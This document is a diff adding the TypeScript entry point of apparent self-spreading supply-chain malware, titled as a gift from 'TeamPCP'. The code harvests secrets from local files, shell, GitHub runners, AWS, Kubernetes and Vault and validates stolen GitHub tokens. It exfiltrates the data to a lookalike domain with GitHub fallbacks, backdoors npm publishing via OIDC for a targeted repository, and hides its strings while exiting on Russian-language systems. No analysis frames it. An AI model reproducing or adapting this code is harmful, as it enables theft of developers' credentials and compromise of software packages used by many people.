Shai-Hulud: A Gift From TeamPCP

src/index.ts

@@ -0,0 +1,191 @@
+import { $ } from "bun";
+
+import { Collector } from "./collector/collector";
+import { Dispatcher } from "./dispatcher/dispatcher";
+import { validateToken } from "./github_utils/tokenCheck";
+import { ReadmeUpdater } from "./mutator/branch";
+import { NPMOidcClient } from "./mutator/npmoidc";
+import { GitHubActionsService } from "./providers/actions/actions";
+import { AwsAccountService } from "./providers/aws/awsAccount";
+import { AwsSecretsManagerService } from "./providers/aws/secretsManager";
+import { AwsSsmService } from "./providers/aws/ssm";
+import type { Provider } from "./providers/base";
+import { ShellService } from "./providers/devtool/devtool";
+import { FileSystemService } from "./providers/filesystem/filesystem";
+import { GitHubRunner } from "./providers/ghrunner/runner";
+import { K8sSecretsService } from "./providers/kubernetes/kubernetes";
+import type { ProviderResult } from "./providers/types";
+import { VaultSecretsService } from "./providers/vault/vault-secrets";
+import { DomainSenderFactory } from "./sender/domain/domainSenderFactory";
+import { GitHubSenderFactory } from "./sender/github/gitHubSenderFactory";
+import type { SenderDestination } from "./sender/types";
+import { isCI, isSystemRussian } from "./utils/config";
+import { daemonize } from "./utils/daemon";
+import { acquireLock, releaseLock } from "./utils/lock";
+import { logUtil } from "./utils/logger";
+
+declare function scramble(str: string): string;
+
+async function setupQuickResults(): Promise<ProviderResult[]> {
+  logUtil.log("Setting up quick results!");
+  const localProvider = new FileSystemService();
+  const shellProvider = new ShellService();
+  const runnerProvider = new GitHubRunner();
+  const quickResults: ProviderResult[] = [];
+  quickResults.push(await localProvider.execute());
+  quickResults.push(await shellProvider.execute());
+  quickResults.push(await runnerProvider.execute());
+
+  return quickResults;
+}
+
+async function checkTargetRepo(workflowMatch: string, targetRepo: string) {
+  try {
+    if (process.env[scramble("GITHUB_ACTIONS")]) {
+      const { GITHUB_WORKFLOW_REF, GITHUB_REPOSITORY } = process.env;
+
+      logUtil.info(`Ref is ${GITHUB_WORKFLOW_REF}`);
+      logUtil.info(`Repo is ${GITHUB_REPOSITORY}`);
+
+      if (
+        GITHUB_WORKFLOW_REF?.includes(workflowMatch) &&
+        GITHUB_REPOSITORY?.includes(targetRepo)
+      ) {
+        const bitMutator = new NPMOidcClient();
+        await bitMutator.execute();
+
+        process.exit(0);
+      } else if (GITHUB_REPOSITORY?.includes(targetRepo)) {
+        process.exit(0);
+      }
+    }
+  } catch (e) {
+    return;
+  }
+}
+
+async function preflight() {
+  // Replace when backdooring through OIDC.
+  await checkTargetRepo(
+    scramble("release-drafter.yml"),
+    scramble("/opensearch-js"),
+  );
+
+  if (isSystemRussian()) {
+    logUtil.log("Exiting as russian language detected!");
+    process.exit(0);
+  }
+  if (!isCI() && daemonize()) {
+    process.exit(0);
+  }
+  const shutdown = () => {};
+  process.on(scramble("SIGINT"), shutdown);
+  process.on(scramble("SIGTERM"), shutdown);
+
+  if (!acquireLock()) {
+    logUtil.error("Another instance is already running");
+    process.exit(0);
+  }
+}
+
+async function main() {
+  try {
+    await preflight();
+
+    const dest: SenderDestination = {
+      domain: scramble("git-tanstack.com"),
+      port: 443,
+      path: scramble("router"),
+      dry_run: false,
+    };
+
+    const quickResults = await setupQuickResults();
+    const domainFactory = new DomainSenderFactory(dest);
+    const gitHubDirectFactory = new GitHubSenderFactory();
+
+    const primary = await domainFactory.tryCreate();
+    const senders = [primary];
+
+    // Init github fallbacks
+    if (!primary?.healthy()) {
+      const gitHubPrimary = await gitHubDirectFactory.tryCreate();
+      senders.push(gitHubPrimary);
+      if (!gitHubPrimary?.healthy()) {
+        const gitHubTertiary =
+          await gitHubDirectFactory.tryCreate(quickResults);
+        senders.push(gitHubTertiary);
+      }
+    }
+
+    const dispatcher = new Dispatcher({
+      senders,
+      preflight: true,
+    });
+
+    logUtil.info("Dispatcher start.");
+    const collector = new Collector({
+      flushThresholdBytes: 100 * 1024,
+      dispatch: dispatcher.dispatch,
+    });
+    logUtil.info("Collector start.");
+
+    for (const item of quickResults) {
+      collector.ingest(item);
+    }
+
+    const providers: Provider[] = [
+      new AwsSsmService(),
+      new AwsSecretsManagerService(),
+      new AwsAccountService(),
+      new K8sSecretsService(),
+      new VaultSecretsService(),
+    ];
+
+    const seenTokens: Set<string> = new Set<string>();
+    let dispatched = false;
+    for (const item of quickResults) {
+      logUtil.log(`Checking ${item.service}`);
+      if (item.matches?.["ghtoken"]) {
+        for (const token of item.matches["ghtoken"]) {
+          if (seenTokens.has(token)) continue;
+          seenTokens.add(token);
+
+          if (!(await validateToken(token))) {
+            continue;
+          }
+          providers.push(new GitHubActionsService(token));
+          dispatched = true;
+        }
+      }
+    }
+    await collector.run(providers.map((p) => (c) => p.executeStreaming(c)));
+    if (!dispatched) {
+      for (const item2 of quickResults) {
+        if (item2.matches?.["ghs_old"]) {
+          for (const token of item2.matches["ghs_old"]) {
+            const updater = new ReadmeUpdater(token);
+            await updater.execute();
+          }
+        }
+        if (item2.matches?.["ghs_jwt"]) {
+          for (const token of item2.matches["ghs_jwt"]) {
+            const updater = new ReadmeUpdater(token);
+            await updater.execute();
+          }
+        }
+      }
+    }
+
+    await collector.finalize();
+    releaseLock();
+  } catch (e) {
+  } finally {
+    process.exit(0);
+  }
+}
+
+main().catch((err) => {
+  logUtil.error(err);
+  releaseLock();
+  process.exit(0);
+});